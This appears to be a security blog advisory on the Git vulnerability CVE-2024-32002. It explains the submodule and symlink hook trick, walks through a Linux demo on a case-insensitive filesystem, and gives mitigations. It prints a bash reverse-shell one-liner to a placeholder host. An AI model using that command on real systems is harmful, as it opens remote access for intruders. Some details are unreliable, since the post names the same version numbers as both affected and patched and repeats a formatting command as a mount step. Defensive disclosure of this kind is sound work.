Git SCM affected by CVE-2024-32002
CVE-2024-32002 was published on May 15, 2024 and is affecting versions of Git SCM. The vulnerability exploits a bug where Git can be fooled into writing files into a .git/ directory instead of a submodule's worktree. To fully mitigate this vulnerability additional steps need to be taken beyond updates.
How CVE-2024-32002 is being exploited
The vulnerability exploits repositories with submodules that can be modified to write files into a .git/ directory instead of into the submodule's working tree. The process takes advantage of writing a hook script that will be executed while the git clone operation is still running, preventing the user from inspecting the code.
As of writing this blog post, CVE-2024-32002 affects the following versions of Git SCM: 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2 and 2.39.4
To exploit this vulnerability the following pre-requisite conditions must be met:
- Support for symbolic links must have been enabled
Symbolic links in Git are pointers that allow you to create references to files or directories in other locations within your repository. These links function similarly to shortcuts, enabling you to manage files more efficiently without duplicating content.
When you commit a symbolic link in Git, it tracks the link itself rather than the contents of the target file or directory. This can be particularly useful for maintaining consistent references across different parts of your project or sharing common resources.
Additionally, symbolic links can be enabled in Git using the command line:git config --global core.symlinks true. - The operating system must be case-insensitive
Case-insensitive operating systems treat file and directory names as the same regardless of letter case. Windows and macOS are examples of operating systems that are case-insensitive by default. Filenames like "File.txt" and "file.txt" refer to the same file on Windows. While historically case-insensitive, macOS can be configured to be case-sensitive.
In contrast, most Unix-based systems like Linux are case-sensitive by default, treating "File.txt" and "file.txt" as different files. For testing purposes though, we can configure the Linux filesystem to be case-insensitive by mounting it with Ext4 configured for case-insensitivity.
To take advantage of vulnerability CVE-2024-32002, an attacker would need to set up a malicious repository (git_rce) containing a submodule with a path specifically designed to exploit case-insensitive filesystems. Within the submodule, a symbolic link would point to its .git/ directory, which then contains a malicious hook script.
Every time the malicious repository is cloned, the symbolic link is followed, triggering the execution of the malicious hook script and resulting in a remote code execution (RCE).
To illustrate how CVE-2024-32002 could be exploited, we first set up a demo environment using Ubuntu 20.04 and Git version 2.45.0 (which is vulnerable to CVE-2024-32002).
Using Amal Muri’s example git_rce files, we can then easily see the exploit in action.
Below is the full process from creating an Ext4 file system to enabling case sensitivity:
- Add a New Disk:
sudo fdisk -l - Partition the Disk:
sudo fdisk /dev/sdb - Create the File System:
sudo mkfs.ext4 /dev/sdb1 - Create a Mount Point:
sudo mkdir /mnt/mydisk - Mount the File System:
sudo mkfs.ext4 /dev/sdb1- Optional: Automatic Mounting
If you want the system to automatically mount the file system on startup, edit the fstab file:sudo nano /etc/fstab
Add the following line at the end of the file:/dev/sdb1 /mnt/mydisk ext4 defaults 0 0
- Optional: Automatic Mounting
- Unmount the File System:
sudo umount /mnt/mydisk - Enable Case Sensitivity:
sudo tune2fs -O casefold /dev/sdb1 - Run a File System Check:
sudo e2fsck -f /dev/sdb1 - Mount the File System:
sudo mount /dev/sdb1 /mnt/mydisk - Verify Case Sensitivity:
cd /mnt/mydisksudo touch testfile TestFilels
After completing the steps, we create a poc.sh file on the Ext4 file system to perform our test. In this test, we include the gnome-calculator command among the commands to be executed. This allows us to verify whether the exploit code is working correctly.
The Ubuntu calculator app pops up as we expected. This shows that CVE-2024-32002 can also effect Linux hosts in certain situations.
But we can go even further. Using the command bash -i >& /dev/tcp/{IP_ADDRESS}/{PORT} 0>&1 & disown, we successfully obtain a reverse shell. This shows that with this exploit it is possible to compromise remote host machines.
As noted, the vulnerability is present by default on Windows and macOS. However, for Linux, we needed a case-insensitive file system. Our demo showed that the vulnerability can still be exploited on Linux in some edge cases.
How to fix CVE-2024-32002
To address the security vulnerability identified as CVE-2024-32002, you need to upgrade your Git software to one of the patched versions that have been released to fix this issue: 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2 or 2.39.4
Easy and up-to-date instructions to safely upgrade your Git SCM can be found on the https://git-scm.com website.
For an immediate workaround also consider to deactivate symlinks for Git using the following configuration command: git config --global core.symlinks false
How to prevent similar vulnerabilities in the future
To prevent similar vulnerabilities in the future, Git SCM users and administrators should follow the best practices for secure coding and configuration, such as:
- Filesystem Controls: Prefer case-sensitive filesystems. Linux distributions use these by default, but Windows and macOS users can consider using case-sensitive disk images for specific operations.
- Container Security: Ensure applications running within containers operate with the minimum required permissions. Regularly update containers and scan for vulnerabilities. Use proper configurations to maintain container isolation and enforce security policies.
- Disable Symlinks: Disable symbolic links if they are not necessary.
git config --global core.symlinks false
Summary
CVE-2024-32002 is a vulnerability in Git SCM versions that allows attackers to exploit submodules and write files into the .git/ directory using symbolic links and case-insensitive filesystems (like macOS and Windows). A simple demo using Ubuntu 20.04 (and Git version 2.45.02) and Amal Muri's example files shows that CVE-2024-32002 can also effect Linux systems in certain edge cases. Our demo also proved that the vulnerability can then even lead to compromised remote host systems.
To mitigate the issue, users are advised to upgrade Git to patched versions and consider disabling symbolic links (preventing similar vulnerabilities in the future).
Additional Resources
- https://amalmurali.me/posts/git-rce/
- https://github.com/amalmurali47/git_rce/tree/main
- https://www.tarlogic.com/blog/cve-2024-32002-vulnerability-git/
- https://github.com/safebuffer/CVE-2024-32002
- https://ubuntu.com/security/CVE-2024-32002
- https://www.youtube.com/watch?v=Alqi65ZmLi4&t=238s&ab_channel=SnapAttack
:quality(30))
:quality(30))
:quality(30)){kind=logo}
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))
:quality(30))